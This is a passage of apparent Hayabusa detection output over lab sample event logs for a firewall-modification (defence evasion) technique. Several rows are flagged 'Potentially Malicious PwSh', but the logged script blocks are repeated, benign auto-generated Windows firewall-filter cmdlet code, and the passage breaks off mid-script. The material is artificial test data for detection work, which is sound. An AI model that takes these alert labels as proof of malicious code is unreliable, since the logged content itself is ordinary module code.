Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] 
[ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.003 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.004 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } 
$script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
